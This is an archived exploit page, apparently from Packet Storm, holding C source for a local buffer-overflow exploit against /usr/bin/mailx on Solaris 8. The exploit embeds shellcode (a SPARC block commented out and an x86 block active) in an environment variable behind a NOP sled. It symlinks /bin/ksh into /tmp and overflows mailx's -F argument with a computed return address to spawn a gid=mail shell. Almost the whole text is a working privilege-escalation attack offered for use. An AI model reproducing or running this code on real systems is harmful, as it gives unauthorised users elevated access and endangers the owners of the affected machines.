/usr/bin/mailx local buffer overflow exploit. Gives gid=mail shell. Tested against Solaris 8.
8270d776c54245c8f9730bdf87c4de6ee29ce8e325d9e3fb78e6f9951ae96cbc/* /usr/bin/mailx overflow
I've tested it on Solaris 8
by Nemes||y -dkl- dragon@shellnow.it
*/
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#define LEN 1150
#define offset 2075
/*-------------------------------------------------------------
char shellcode[] =
"\xa0\x23\xa0\x10\xee\x23\xbf\xec\x82\x05\xe0\xd6\x90\x25\xe0\x0e\x92\x25\xe0\x0e\x94\x1c\x40\x11"
"\x96\x1c\x40\x11\x98\x25\xe0\x0f\x91\xd0\x38\x08\xa4\x1a\x80\x08\xd2\x33\xbf\xf0\xac\x10\x27\xd1"
"\xec\x33\xbf\xf2\xc0\x23\xbf\xf4\x82\x05\xe0\xd8\x90\x1a\xc0\x12\x92\x1a\xc0\x10\x94\x1a\xc0\x17"
"\x91\xd0\x38\x08\x82\x05\xe0\xd9\x90\x1a\xc0\x12\x92\x25\xe0\x0b\x91\xd0\x38\x08\x82\x05\xe0\xda"
"\x90\x1a\xc0\x12\x92\x1a\xc0\x10\x94\x23\xa0\x14\x91\xd0\x38\x08\xa6\x1a\xc0\x08\x82\x05\xe0\x2e"
"\x90\x1a\xc0\x13\x92\x25\xe0\x07\x94\x1b\x80\x0e\x91\xd0\x38\x08\x90\x1a\xc0\x13\x92\x25\xe0\x07"
"\x94\x02\xe0\x01\x91\xd0\x38\x08\x90\x1a\xc0\x13\x92\x25\xe0\x07\x94\x02\xe0\x02\x91\xd0\x38\x08"
"\x90\x1b\x80\x0e\x82\x02\xe0\x17\x91\xd0\x38\x08\x21\x0b\xd8\x9a\xa0\x14\x21\x6e\x23\x0b\xdc\xda"
"\x90\x23\xa0\x10\x92\x23\xa0\x08\x94\x1b\x80\x0e\xe0\x3b\xbf\xf0\xd0\x23\xbf\xf8\xc0\x23\xbf\xfc"
"\x82\x02\xe0\x3b\x91\xd0\x38\x08\x90\x1b\x80\x0e\x82\x02\xe0\x01\x91\xd0\x38\x08";
to get stackpointer...
{ __asm__("mov %sp,%i0 \n");}
---------------------------------------------------------------*/
/*-------------------------------------------------------------*/
char shellcode[]=
"\xeb\x1c\x5e\x33\xc0\x33\xdb\xb3\x08\xfe\xc3\x2b\xf3\x88\x06"
"\x6a\x06\x50\xb0\x88\x9a\xff\xff\xff\xff\x07\xee\xeb\x06\x90"
"\xe8\xdf\xff\xff\xff\x55\x8b\xec\x83\xec\x08\xeb\x5d\x33\xc0"
"\xb0\x3a\xfe\xc0\xeb\x16\xc3\x33\xc0\x40\xeb\x10\xc3\x5e\x33"
"\xdb\x89\x5e\x01\xc6\x46\x05\x07\x88\x7e\x06\xeb\x05\xe8\xec"
"\xff\xff\xff\x9a\xff\xff\xff\xff\x0f\x0f\xc3\x5e\x33\xc0\x89"
"\x76\x08\x88\x46\x07\x33\xd2\xb2\x06\x02\xd2\x89\x04\x16\x50"
"\x8d\x46\x08\x50\x8b\x46\x08\x50\xe8\xb5\xff\xff\xff\x33\xd2"
"\xb2\x06\x02\xd2\x03\xe2\x6a\x01\xe8\xaf\xff\xff\xff\x83\xc4"
"\x04\xe8\xc9\xff\xff\xff\x2f\x74\x6d\x70\x2f\x78\x78";
unsigned long stackpointer(void)
{
__asm__("movl %esp, %eax");
}
/*-------------------------------------------------------------*/
int main()
{
long esp = stackpointer();
unsigned char buf[LEN];
char *envi;
unsigned long magic = esp + offset;
printf("\nSolaris Mailx Exploit - coded by Nemes||y -dkl-\n\n");
printf(":: Stack Pointer -> 0x%x\n", esp);
printf(":: Offset -> 0x%x\n", offset);
printf(":: Return addr -> 0x%x\n\n", magic);
envi = (char *)malloc(300*sizeof(char));
memset(envi,0x90,300);
memcpy(envi+280-strlen(shellcode),shellcode,strlen(shellcode));
memcpy(envi,"SOR=",4);
envi[299]=0; putenv(envi);
symlink("/bin/ksh","/tmp/xx");
memset(buf,0x41,1150); memcpy(buf+1116,&magic,4);
buf[1149]=0;
execl("/usr/bin/mailx","mailx","-F",buf,NULL);
}
/* EoF */
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed